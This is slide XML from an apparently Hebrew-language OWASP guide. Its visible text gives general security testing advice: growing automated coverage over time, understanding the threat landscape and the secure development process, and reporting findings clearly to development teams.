            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>אסטרטגיית בדיקות</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="233645" y="6266896"/>
              <a:ext cx="5549303" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="86400" rIns="82800" bIns="86400" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>אינכם חייב לבדוק כל דבר. התמקדו במה שחשוב והרחיבו את תוכנית הבדיקות במשך הזמן. פירוש הדבר הרחבת אוסף הגנות אבטחת המידע והסיכונים אשר נבדקים בצורה ממוכנת וכן הרחבת אוסף היישומים וממשקי הפיתוח (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>APIs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>) אשר מקבלים כיסוי. המטרה להשיג מצב שבו בדיקות האבטחה המהותיות לכל היישומים וממשקי הפיתוח (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>APIs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>) נבחנות בצורה שוטפת.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle: Rounded Corners 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5784070" y="6205362"/>
              <a:ext cx="930295" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="1050" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>השג כיסוי</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="1050" b="1" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> ודיוק</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="233645" y="7227295"/>
              <a:ext cx="5549303" cy="852486"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="86400" rIns="82800" bIns="86400" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="950" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ללא</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> קשר לאיכות הבדיקות, הדבר לא יהיה אפקטיבי במידה ואינכם מתקשרים זאת כראוי. צרו אמון ע"י הצגת הידע שלכם לגבי האופן בו היישום פועל. הסבירו בבהירות כיצד ניתן לנצל את היישום ללא שימוש במונחים מקצועיים וכללו תרחישי תקיפה על-מנת להפוך את ההדגמה למוחשית. בצעו הערכה מציאותית כמה קשה לאתר חולשת אבטחה ולנצל אותה, וכמה מסוכן זה יהיה. לסיכום, תקשרו את הממצאים לתוך הכלים של צוותי הפיתוח, לא כקבצי </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>PDF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="he-IL" sz="950" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5784070" y="7214424"/>
              <a:ext cx="930295" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{FA493BA7-5997-4A18-9618-62319A0A692F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5769260" y="3340604"/>
            <a:ext cx="935580" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הבן את מתאר האיומים</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1AA98B84-34A6-4B60-9C0A-BF59F260AF1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5769260" y="4256965"/>
            <a:ext cx="935580" cy="877163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הבן את תהליך הפיתוח המאובטח</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4155ED7B-C46B-4C58-9799-5E20D5780F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5679250" y="7441867"/>
            <a:ext cx="1151765" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>תקשר ממצאים בבהירות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16893207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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3100801113"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="1143000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="340914">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Copyright and License</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8020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aseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Copyright © 2003 – 2017 The OWASP Foundation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000" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This document is released under the Creative Commons Attribution Share-Alike 4.0 license. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>For any reuse or distribution, you must make it clear to others the license terms of this work.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="13716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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="by-sa.png">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print">
            <a:extLst/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8522201"/>
            <a:ext cx="1046163" cy="366027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857277979"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="3352800" cy="7008415"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336555">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תוכן העניינים</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6671860">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
